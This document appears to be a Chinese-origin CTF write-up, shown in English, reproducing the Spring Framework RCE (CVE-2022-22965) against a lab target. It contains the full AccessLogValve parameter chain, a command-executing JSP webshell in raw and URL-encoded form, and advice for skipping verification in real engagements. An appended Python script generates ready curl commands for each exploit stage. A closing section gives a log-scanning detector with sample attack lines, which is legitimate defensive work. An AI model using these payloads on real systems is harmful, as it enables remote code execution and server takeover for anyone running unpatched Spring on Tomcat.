CNVD-2022-23942 (Spring Framework RCE via data binding, CVE-2022-22965)
1. Affected scope:
1. JDK 9+
2. Spring Framework 5.3.x < 5.3.18
Spring Framework 5.2.x < 5.2.20
3. Application deployed as a WAR on Apache Tomcat (the chain below writes the file through Tomcat's access log valve, so a Spring Boot jar with embedded Tomcat is not reached by it)
2. Principle: Spring's data binder maps request parameter names onto nested bean properties. On JDK 9+ the path class.module.classLoader reaches Tomcat's web application class loader, and from there resources.context.parent.pipeline.first is the Host's first valve, the AccessLogValve. Setting its properties rewrites the Tomcat access log configuration so that the next logged request is written, with attacker-controlled content, as a .jsp file under the web root; the complete exploit chain:
class.module.classLoader.resources.context.parent.pipeline.first.pattern=
the content of the file to be written (the log line format)
class.module.classLoader.resources.context.parent.pipeline.first.suffix=
the suffix of the Tomcat log file (.jsp so that Tomcat parses it)
class.module.classLoader.resources.context.parent.pipeline.first.directory=
the web root directory the file is written into
class.module.classLoader.resources.context.parent.pipeline.first.prefix=
the name of the file written
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
the file date format (in practice, an empty value is enough; otherwise Tomcat appends a date to the file name)
3. Reproduction steps
Start the target range
Visit the range and capture the request with a proxy
Construct the payload // line breaks were added here for readability; when sending, delete the whitespace after each "&"
?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring&
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
Send the payload:
GET method (either as five separate requests, one property each, or as a single request). If ok appears in the response, the properties were set.
After sending the payload, visit http://123.58.224.8:15494/shell.jsp ; if the word spring appears on the page, the write succeeded: the pattern is now the log line, so the next request Tomcat logged was written as webapps/ROOT/shell.jsp.
The next step is to change the pattern to a webshell and let Tomcat write and parse it.
Write the webshell to the web root.
Webshell code:
Webshell before URL encoding:
%{c}i if("d".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{e}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{f}i
Webshell after URL encoding:
%25%7Bc%7Di%20if(%22d%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Be%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bf%7Di
The three placeholders are filled from request headers sent with the same request: in an AccessLogValve pattern, %{name}i expands to the value of the request header name. This keeps "<%" and "%>" out of the pattern itself, where "%" is the escape character and would be misparsed (it also keeps the obvious JSP markers out of the query string):
f: %>//
e: Runtime
c: <%
The webshell here is also copied from someone else's work; the author explains its analysis at around minute 17 of the video https://www.bilibili.com/video/BV19u411y7iA . Readers who understand the principle better are welcome to leave a message in the comments so we can learn together~
Returning ok indicates that the webshell has been written to the server.
Access it and get the flag:
http://123.58.224.8:15494/shell.jsp?pwd=d&cmd=ls%20/tmp
Other arbitrary commands can be run the same way, for example whoami,
or a ping to a DNSLog domain to confirm execution out of band.
In a real engagement the verification step (writing "spring" first) can be skipped and the webshell written directly.
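The whole procedure above, as an added example in Python (not code from the write-up or from the video): it URL-encodes the five AccessLogValve properties into the query string, keeps the three headers c/e/f with the request that sets the shell pattern, and mimics the one AccessLogValve substitution the chain depends on (%{name}i -> header value) so the JSP source Tomcat will write can be inspected before anything is sent. The target URL, header names and shell body are those of the write-up; the function names are this example's own, and nothing here touches the network.

```python
"""
Added example (not from the original write-up): build the request that
sets Tomcat's AccessLogValve properties through Spring's data binder, and
render the JSP that the valve will log.  Target, header names c/e/f and the
shell body come from the write-up; function names are this example's own.
"""
import re
from urllib.parse import quote, urlencode

TARGET = "http://123.58.224.8:15494"   # range from the write-up
VALVE = "class.module.classLoader.resources.context.parent.pipeline.first."

# Web shell exactly as in the write-up.  "%{name}i" is AccessLogValve's
# escape for "value of request header <name>", so the characters that
# cannot sit in the pattern itself ("<%", "%>") arrive in headers c, e, f.
SHELL_PATTERN = (
    '%{c}i if("d".equals(request.getParameter("pwd"))){ '
    'java.io.InputStream in = %{e}i.getRuntime().exec('
    'request.getParameter("cmd")).getInputStream(); int a = -1; '
    'byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ '
    'out.println(new String(b)); } } %{f}i'
)
SHELL_HEADERS = {"c": "<%", "e": "Runtime", "f": "%>//"}


def build_query(pattern, suffix=".jsp", directory="webapps/ROOT",
                prefix="shell", file_date_format=""):
    """URL-encode the five AccessLogValve properties into one query string.

    quote() rather than quote_plus() so spaces become %20 as in the
    write-up; the empty fileDateFormat stops Tomcat appending a date.
    """
    params = {
        VALVE + "pattern": pattern,
        VALVE + "suffix": suffix,
        VALVE + "directory": directory,
        VALVE + "prefix": prefix,
        VALVE + "fileDateFormat": file_date_format,
    }
    return urlencode(params, safe="/", quote_via=quote)


def render_access_log_pattern(pattern, request_headers):
    """Mimic AccessLogValve's %{name}i escape: header value, "-" if absent.

    Only this escape is modelled; it is the only one the chain uses.
    """
    return re.sub(r"%\{([^}]+)\}i",
                  lambda m: request_headers.get(m.group(1), "-"), pattern)


def exploit_requests(base=TARGET):
    """The write-up's stages as (url, headers) pairs, in sending order.

    Stage 1 writes the marker "spring" into webapps/ROOT/shell.jsp to prove
    the chain works; stage 2 re-points the pattern at the shell, carrying
    the c/e/f headers; stage 3 uses the shell.  The file content appears
    when Tomcat logs a request after the properties are set.
    """
    probe = (f"{base}/?{build_query('spring')}", {})
    shell = (f"{base}/?{build_query(SHELL_PATTERN)}", dict(SHELL_HEADERS))
    use = (f"{base}/shell.jsp?pwd=d&cmd=ls%20/tmp", {})
    return [probe, shell, use]


def as_curl(url, headers):
    """Render one stage as a curl command line for manual use."""
    hdrs = "".join(f" -H '{k}: {v}'" for k, v in headers.items())
    return f"curl -s{hdrs} '{url}'"


if __name__ == "__main__":
    print("JSP source Tomcat will log into shell.jsp:")
    print(render_access_log_pattern(SHELL_PATTERN, SHELL_HEADERS))
    print()
    for url, headers in exploit_requests():
        print(as_curl(url, headers))
```

Running it prints the rendered shell (it starts with `<% if("d".equals(` and ends with `%>//`) followed by three curl lines. Note that the pattern stays in effect for every later request, so each further request appends a line (with "-" where the c/e/f headers are missing) to shell.jsp; that is harmless JSP template text but explains why the file keeps growing.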
Summary: through this vulnerability a webshell can be written into the web root, which gives command execution.
If this helped you, please give it a thumbs up!
Disclaimer: this article is for learning purposes only; it must not be used for unauthorized penetration testing, and illegal use is prohibited.
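Because every step of the chain arrives as a request parameter whose name walks through class.module.classLoader and ends in an AccessLogValve property, the parameter names themselves are the detection signal. The following added example (not from the write-up) scans access log lines for those names after URL-decoding them, going slightly beyond the write-up by also catching case variants and a percent-encoded dot in the name (the shapes Spring's own workaround disallows: class.*, Class.*, *.class.*, *.Class.*), and by tagging a later request for a .jsp from the same client as possible shell use. The log lines are constructed for the example; the function names are this example's own.

```python
"""
Added example (not code from the write-up): flag this exploit chain in
Tomcat or proxy access logs.  The sample log is constructed here.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Request line inside a common/combined format access log entry.
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# A bound property path that walks through getClass(): the shapes Spring's
# advisory blocks (class.*, Class.*, *.class.*, *.Class.*).
CLASS_WALK = re.compile(r"(^|\.)class\.", re.IGNORECASE)
# AccessLogValve properties the write-up's chain sets.
VALVE_PROPS = {"pattern", "suffix", "directory", "prefix", "filedateformat"}
# AccessLogValve header escape used to smuggle "<%", "Runtime", "%>" in.
HEADER_ESCAPE = re.compile(r"%\{[^}]+\}i")

# Constructed sample: lines 1-3 are the write-up's procedure from one
# client, line 4 is benign, lines 5-6 are case and encoding variants.
SAMPLE_LOG = """\
10.0.0.5 - - [30/Mar/2022:10:12:01 +0000] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= HTTP/1.1" 200 2
10.0.0.5 - - [30/Mar/2022:10:12:40 +0000] "GET /?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc%7Di%20if(%22d%22.equals(request.getParameter(%22pwd%22)))%7B%20%25%7Be%7Di.getRuntime()%20%7D%20%25%7Bf%7Di HTTP/1.1" 200 2
10.0.0.5 - - [30/Mar/2022:10:13:20 +0000] "GET /shell.jsp?pwd=d&cmd=ls%20/tmp HTTP/1.1" 200 512
10.0.0.9 - - [30/Mar/2022:10:14:00 +0000] "GET /index.html?classroom=5&name=spring HTTP/1.1" 200 1024
10.0.0.11 - - [30/Mar/2022:10:15:00 +0000] "GET /?Class.Module.ClassLoader.resources.context.parent.pipeline.first.suffix=.jsp HTTP/1.1" 400 0
10.0.0.11 - - [30/Mar/2022:10:15:30 +0000] "GET /?class%2Emodule%2EclassLoader.resources.context.parent.pipeline.first.prefix=x HTTP/1.1" 200 2
"""


def classify_request(target):
    """Tag one request target (path?query) after URL-decoding its parameters."""
    tags = set()
    query = urlsplit(target).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        if not CLASS_WALK.search(name):
            continue
        tags.add("classloader-walk")
        leaf = name.rsplit(".", 1)[-1].lower()
        if ".pipeline." in name.lower() and leaf in VALVE_PROPS:
            tags.add("accesslog-" + leaf)
        if leaf == "pattern" and (HEADER_ESCAPE.search(value) or "<%" in value):
            tags.add("jsp-in-pattern")
    return tags


def scan_access_log(lines):
    """Return (line_no, client_ip, sorted tags) for each suspicious line.

    A later request for a .jsp from a client that already set valve
    properties is tagged as possible use of the written shell.
    """
    hits, writers = [], set()
    for n, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue
        ip = line.split(" ", 1)[0]
        target = m.group("target")
        tags = classify_request(target)
        if "classloader-walk" in tags:
            writers.add(ip)
        elif ip in writers and urlsplit(target).path.endswith(".jsp"):
            tags.add("possible-webshell-use")
        if tags:
            hits.append((n, ip, sorted(tags)))
    return hits


if __name__ == "__main__":
    for n, ip, tags in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"line {n} {ip}: {', '.join(tags)}")
```

Access logs only show GET query strings; the same parameter names in a POST body reach the data binder just as well, so where a WAF or reverse proxy logs request bodies, run classify_request over those too. The benign line 4 (a parameter merely starting with "class") is not flagged, because the regex requires a dot after "class".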